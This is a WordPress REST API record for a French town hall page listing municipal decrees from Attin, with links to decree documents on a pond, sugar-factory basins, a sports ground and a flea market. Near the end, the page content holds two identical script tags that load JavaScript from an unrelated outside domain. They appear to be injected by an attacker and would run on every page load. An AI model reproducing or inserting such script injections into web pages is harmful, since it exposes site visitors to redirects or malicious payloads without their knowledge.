{"id":2695,"date":"2020-08-10T14:31:50","date_gmt":"2020-08-10T13:31:50","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=2695"},"modified":"2024-04-20T07:29:22","modified_gmt":"2024-04-20T06:29:22","slug":"arretes-municipaux","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=2695","title":{"rendered":"Arr\u00eat\u00e9s municipaux"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"2695\" class=\"elementor elementor-2695\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2bc64d2d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2bc64d2d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3ee0dd68\" data-id=\"3ee0dd68\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-660d2d74 elementor-widget elementor-widget-text-editor\" data-id=\"660d2d74\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2024\/04\/Arr\u00eat\u00e9-mare-2024.pdf\">Arr\u00eat\u00e9 mare 2024<\/a><\/p><p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2023\/11\/arrete-tereos-bassins-23-novembre-2023.pdf\">arrete tereos bassins 23 novembre 2023<\/a><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2021\/04\/arrete-city-stade.pdf\">arrete city stade<\/a> Arr\u00eat\u00e9 pr\u00e9fectoral de mesures d&rsquo;urgence Soci\u00e9t\u00e9 Tereos Sucre France<\/p><p>\u00a0<\/p><p>\u00a0Arr\u00eat\u00e9 fixant les modalit\u00e9s de police des jardins, parcs de jeux, squares et terrains de sport<\/p><p>Arr\u00eat\u00e9 brocante de l&rsquo;Us Attin du 6 septembre 2020 au Domaine du Ch\u00e2teau<\/p><p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/08\/arrete-brocante.docx\">arrete brocante<\/a><\/p><p>\u00a0<\/p><p>\u00a0<\/p><p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p><p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p><div>\u00a0<\/div><p>\u00a0<\/p><p>\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Arr\u00eat\u00e9 mare 2024 arrete tereos bassins 23 novembre 2023arrete city stade Arr\u00eat\u00e9 pr\u00e9fectoral de mesures d&rsquo;urgence Soci\u00e9t\u00e9 Tereos Sucre France \u00a0 \u00a0Arr\u00eat\u00e9 fixant les modalit\u00e9s de police des jardins, parcs de jeux, squares et terrains de sport Arr\u00eat\u00e9 brocante de l&rsquo;Us Attin du 6 septembre 2020 au Domaine du Ch\u00e2teau arrete brocante \u00a0 \u00a0 \u00a0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2695","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2695","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2695"}],"version-history":[{"count":9,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2695\/revisions"}],"predecessor-version":[{"id":3187,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2695\/revisions\/3187"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2695"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}